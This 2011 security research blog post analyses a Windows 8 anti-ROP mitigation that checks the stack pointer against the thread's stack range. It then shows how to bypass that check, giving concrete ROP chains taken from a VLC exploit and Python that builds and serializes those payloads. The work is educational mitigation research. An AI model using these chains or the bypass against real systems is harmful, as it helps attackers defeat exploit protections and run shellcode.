This blog post was originally published on September 21, 2011.
Windows 8 introduced a number of exploit mitigation features, including hardening of both the userland and kernel heaps, mitigation against kernel-mode NULL pointer dereferences, and protection against abuse of virtual function pointer tables. One feature that stood out to me appears to be designed to help mitigate exploits leveraging return-oriented programming (ROP).
For those who don’t know, ROP is a generalization of the classic return-to-libc attack that involves leveraging small sequences of instructions, typically function epilogues, at known addresses to execute arbitrary code incrementally. This is achieved by controlling data pointed to by ESP, the stack pointer register, such that each ret instruction results in incrementing ESP and transferring execution to the next address chosen by the attacker.
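To make the mechanism concrete, here is a toy model in Python rather than real machine code. The gadget addresses (0x1000, 0x2000, 0x3000) and the register set are invented for illustration; the only point is that each "ret" reads the next attacker-supplied value at the stack pointer and advances past it.

```python
# Toy model of ROP dispatch. Addresses and gadgets are hypothetical.

def pop_eax(regs, stack, esp):
    # pop eax; ret -> load the next stack slot into eax
    regs["eax"] = stack[esp]
    return esp + 1

def pop_ebx(regs, stack, esp):
    # pop ebx; ret -> load the next stack slot into ebx
    regs["ebx"] = stack[esp]
    return esp + 1

def add_eax_ebx(regs, stack, esp):
    # add eax, ebx; ret -> consumes no stack data of its own
    regs["eax"] = (regs["eax"] + regs["ebx"]) & 0xFFFFFFFF
    return esp

GADGETS = {0x1000: pop_eax, 0x2000: pop_ebx, 0x3000: add_eax_ebx}

def run_chain(stack):
    regs = {"eax": 0, "ebx": 0}
    esp = 0  # index into the fake stack, standing in for ESP
    while esp < len(stack):
        target = stack[esp]  # ret reads the address at ESP...
        esp += 1             # ...and moves ESP past it
        esp = GADGETS[target](regs, stack, esp)
    return regs

chain = [0x1000, 40, 0x2000, 2, 0x3000]
print(run_chain(chain)["eax"])  # 42
```

The attacker never injects instructions here; the "program" is just the list of addresses and data laid out where the stack pointer will walk.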
Because finding sequences of useful instructions (known as “gadgets”) may be difficult depending on the exploitation scenario, most real ROP exploits use an initial ROP stager to create a writable and executable memory segment that a second-stage traditional shellcode can be copied into. Most frequently, VirtualProtect can be used to mark an existing executable segment writable, or VirtualAlloc can be used to create a fresh segment. Other variations also exist.
A second trait common to many ROP exploits is that the ROP payload itself often doesn’t live in the thread’s stack, due to either the nature of the vulnerability itself or limits on the attacker’s ability to introduce code into portions of the vulnerable application’s address space. Instead, it’s much more common for a ROP payload to be positioned in the heap and pivot the stack pointer into the heap, at which point the ROP payload can run.
Microsoft has evidently been paying attention and noticed these two common factors. In an attempt to mitigate these types of exploits, Windows 8 implements a simple protection mechanism: every function associated with manipulating virtual memory, including the often-abused VirtualProtect and VirtualAlloc, now includes a check that the stack pointer, as contained in the trap frame, falls within the range defined by the Thread Environment Block (TEB). Code courtesy of Alex Ionescu:
char __cdecl PsValidateUserStack()
{
  char Status; // al@1
  _KTRAP_FRAME *TrapFrame; // ecx@3
  _TEB *Teb; // ecx@3
  void *.Eip; // [sp+10h] [bp-88h]@3
  unsigned int .Esp; // [sp+14h] [bp-84h]@3
  void *StackLimit; // [sp+18h] [bp-80h]@3
  void *StackBase; // [sp+1Ch] [bp-7Ch]@3
  _EXCEPTION_RECORD ExitStatus; // [sp+24h] [bp-74h]@6
  CPPEH_RECORD ms_exc; // [sp+80h] [bp-18h]@3

  CurrentThread = (_ETHREAD *)__readfsdword(0x124u);
  Status = LOBYTE(CurrentThread->Tcb.___u42.UserAffinity.Reserved[0]); // PreviousMode == User
  if ( Status )
  {
    __asm { bt dword ptr [edx+58h], 13h } // KernelStackResident, ReadyTransition, Alertable
    Status = _CF;
    if ( _CF != 1 )
    {
      TrapFrame = CurrentThread->Tcb.TrapFrame;
      .Esp = TrapFrame->HardwareEsp;
      .Eip = (void *)TrapFrame->Eip;
      Teb = (_TEB *)CurrentThread->Tcb.Teb;
      ms_exc.disabled = 0;
      StackLimit = Teb->DeallocationStack;
      StackBase = Teb->NtTib.StackBase;
      ms_exc.disabled = -2;
      Status = .Esp;
      if ( .Esp < (unsigned int)StackLimit || .Esp >= (unsigned int)StackBase )
      {
        memset(&ExitStatus, 0, 0x50u);
        ExitStatus.ExceptionCode = STATUS_STACK_BUFFER_OVERRUN;
        ExitStatus.ExceptionAddress = .Eip;
        ExitStatus.NumberParameters = 2;
        ExitStatus.ExceptionInformation[0] = 4;
        ExitStatus.ExceptionInformation[1] = .Esp;
        Status = DbgkForwardException(&ExitStatus, 1, 1);
        if ( !Status )
        {
          Status = DbgkForwardException(&ExitStatus, 0, 1);
          if ( !Status )
            Status = ZwTerminateProcess((HANDLE)0xFFFFFFFF, ExitStatus.ExceptionCode);
        }
      }
    }
  }
  return Status;
}
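Stripped of the decompiler noise, the core of the check is a range comparison: the saved user-mode ESP must satisfy DeallocationStack <= ESP < StackBase. The Python sketch below models only that comparison. The function name and the addresses are made up for illustration, and the sketch ignores the PreviousMode test and the exception forwarding seen in the listing.

```python
STATUS_STACK_BUFFER_OVERRUN = 0xC0000409

def check_stack_pointer(esp, deallocation_stack, stack_base):
    """Return 0 if esp lies inside the thread's stack range,
    otherwise the status code raised in the listing above."""
    if esp < deallocation_stack or esp >= stack_base:
        return STATUS_STACK_BUFFER_OVERRUN
    return 0

# Hypothetical TEB values for a thread with a 1 MB stack reservation.
stack_limit = 0x00130000
stack_base = 0x00230000

print(hex(check_stack_pointer(0x0022F000, stack_limit, stack_base)))  # 0x0
print(hex(check_stack_pointer(0x0C0C0C0C, stack_limit, stack_base)))  # 0xc0000409
```

Note that the upper bound is exclusive: an ESP exactly equal to StackBase fails the check, which matches the `>=` comparison in the decompiled code.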
As a result, exploits that leverage a ROP payload stored in the heap cannot return into VirtualProtect or VirtualAlloc to create a writable and executable segment. While this provides yet another hurdle for exploit writers, it’s fairly easy to bypass. Besides writing a full ROP payload that doesn’t need a second stage, which may be difficult depending on the availability of gadgets, one simple way of avoiding this protection is to give it what it wants: ensure ESP points into the current thread’s stack whenever virtual memory functions are called. In the example below, I’ll assume the attacker has access to the original stack pointer through some register, as is the case when a pivot is performed using an xchg instruction. If this isn’t the case, it may be worth investigating ways of finding the stack at runtime.
To demonstrate, let’s take the very basic ROP payload I used for a VLC exploit as an example. After triggering the vulnerability, I pivot the stack pointer into the heap using a gadget that executes the following:
xchg esi, esp
retn
In this case, the ESI register contains a pointer to heap data I control, so by pivoting the stack pointer into this region, I can execute my first-stage ROP payload:
rop = [
    rop_base + 0x1022,    # retn
    # Call VirtualProtect()
    rop_base + 0x2c283,   # pop eax; retn
    rop_base + 0x1212a4,  # IAT entry for VirtualProtect -> eax
    rop_base + 0x12fda,   # mov eax,DWORD PTR [eax]
    rop_base + 0x29d13,   # jmp eax
    rop_base + 0x1022,    # retn
    heap & ~0xfff,        # lpAddress
    0x60000,              # dwSize
    0x40,                 # flNewProtect
    heap - 0x1000,        # lpflOldProtect
    # Enough of this ROP business...
    rop_base + 0xdace8    # push esp; retn
]
This payload pulls the address for VirtualProtect from the Import Address Table (IAT), calls it to mark the heap executable, and jumps into the newly-executable heap to run a second-stage traditional shellcode.
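For readers who want to see how a list like this becomes bytes in memory, here is a minimal Python sketch that serializes it as 32-bit little-endian values. The ROP_BASE and HEAP values are placeholders I picked for illustration (the real ones depend on the target module and heap layout), and pack_chain is a hypothetical helper, not part of the original exploit.

```python
import struct

# Placeholder addresses for illustration only.
ROP_BASE = 0x10000000
HEAP = 0x0c0c0c0c

def pack_chain(entries):
    """Serialize each entry as a 32-bit little-endian value."""
    return b"".join(struct.pack("<I", entry & 0xFFFFFFFF) for entry in entries)

rop = [
    ROP_BASE + 0x1022,    # retn
    ROP_BASE + 0x2c283,   # pop eax; retn
    ROP_BASE + 0x1212a4,  # IAT entry for VirtualProtect -> eax
    ROP_BASE + 0x12fda,   # mov eax,DWORD PTR [eax]
    ROP_BASE + 0x29d13,   # jmp eax
    ROP_BASE + 0x1022,    # retn (return address for VirtualProtect)
    HEAP & ~0xfff,        # lpAddress, rounded down to a page boundary
    0x60000,              # dwSize
    0x40,                 # flNewProtect (PAGE_EXECUTE_READWRITE)
    HEAP - 0x1000,        # lpflOldProtect, any writable address
    ROP_BASE + 0xdace8,   # push esp; retn
]

payload = pack_chain(rop)
print(len(payload))  # 44
```

Eleven entries at four bytes each give a 44-byte first stage, which is the baseline for the size comparison later in the post.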
Because ESP points into the heap at the time of the VirtualProtect call, this exploit would fail due to the newly introduced mitigation in Windows 8. However, it’s relatively simple to adapt it to bypass this mitigation. Below is the updated ROP payload:
rop = [
    rop_base + 0x1022,    # retn
    # Write lpflOldProtect
    rop_base + 0x2c283,   # pop eax; retn
    heap - 0x1000,        # lpflOldProtect -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    # Write flNewProtect
    rop_base + 0x2c283,   # pop eax; retn
    0x40,                 # flNewProtect -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    # Write dwSize
    rop_base + 0x2c283,   # pop eax; retn
    0x60000,              # dwSize -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    # Write lpAddress
    rop_base + 0x2c283,   # pop eax; retn
    heap & ~0xfff,        # lpAddress -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    # Write &Pivot
    rop_base + 0x2c283,   # pop eax; retn
    rop_base + 0x229a5,   # &pivot -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    # Write &VirtualProtect
    rop_base + 0x2c283,   # pop eax; retn
    rop_base + 0x1212a4,  # IAT entry for VirtualProtect -> eax
    rop_base + 0x12fda,   # mov eax,DWORD PTR [eax]
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    # Pivot ESP
    rop_base + 0x229a5,   # xchg esi,esp; retn
    # Jump into shellcode
    rop_base + 0xdace8    # push esp; retn
]
This is a very crude example, but I think it demonstrates the idea just fine. I write the arguments to VirtualProtect onto the original stack, whose pointer is held in the ESI register after the first pivot, one at a time and in reverse order, since ESI moves down four bytes after each write. In the slot VirtualProtect will use as its return address, I place the address of the pivot gadget, so that ESP moves back to the heap when the call completes. Finally, to trigger the whole thing, I return into the pivot gadget myself, which swaps ESP back to the original stack and returns into VirtualProtect.
In this case, adapting the exploit added an extra 124 bytes to the payload, but that was mostly because I was limited by gadget availability and had to resort to decrementing ESI one byte at a time. It’s probably possible to optimize this example with some extra work. In other cases, I’d expect it to be possible to implement this technique with much less overhead.
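The repeated "load, store, step back four bytes" pattern is easy to generate programmatically, which also makes the overhead easy to check. The Python sketch below rebuilds both payloads from the gadget offsets listed in this post. The helper names and the ROP_BASE and HEAP values are hypothetical placeholders, not the original exploit code.

```python
# Gadget offsets taken from the payload listings in this post.
RETN = 0x1022
POP_EAX = 0x2c283           # pop eax; retn
LOAD_EAX = 0x12fda          # mov eax,DWORD PTR [eax]
JMP_EAX = 0x29d13           # jmp eax
STORE_EAX = 0x1db4f         # mov [esi],eax; retn
DEC_ESI = 0x3ab5e           # dec esi; retn
PIVOT = 0x229a5             # xchg esi,esp; retn
PUSH_ESP = 0xdace8          # push esp; retn
VIRTUALPROTECT_IAT = 0x1212a4

def original_chain(base, heap):
    return [base + RETN, base + POP_EAX, base + VIRTUALPROTECT_IAT,
            base + LOAD_EAX, base + JMP_EAX, base + RETN,
            heap & ~0xfff, 0x60000, 0x40, heap - 0x1000,
            base + PUSH_ESP]

def write_dword(base, value):
    """Store value at [esi], then move esi down one dword (four dec esi)."""
    return [base + POP_EAX, value, base + STORE_EAX] + [base + DEC_ESI] * 4

def bypass_chain(base, heap):
    chain = [base + RETN]
    # Arguments are written last-to-first because esi moves downward.
    for value in (heap - 0x1000, 0x40, 0x60000, heap & ~0xfff, base + PIVOT):
        chain += write_dword(base, value)
    # Resolve VirtualProtect through the IAT and store it as the final slot.
    chain += [base + POP_EAX, base + VIRTUALPROTECT_IAT,
              base + LOAD_EAX, base + STORE_EAX]
    # Pivot to the original stack, then run the shellcode after returning.
    chain += [base + PIVOT, base + PUSH_ESP]
    return chain

ROP_BASE, HEAP = 0x10000000, 0x0c0c0c0c  # placeholder addresses
old = original_chain(ROP_BASE, HEAP)
new = bypass_chain(ROP_BASE, HEAP)
print((len(new) - len(old)) * 4)  # 124
```

Of the 42 entries in the adapted chain, 20 are `dec esi` gadgets, so a single gadget that subtracts four from ESI would, under these assumptions, remove 15 entries (60 bytes).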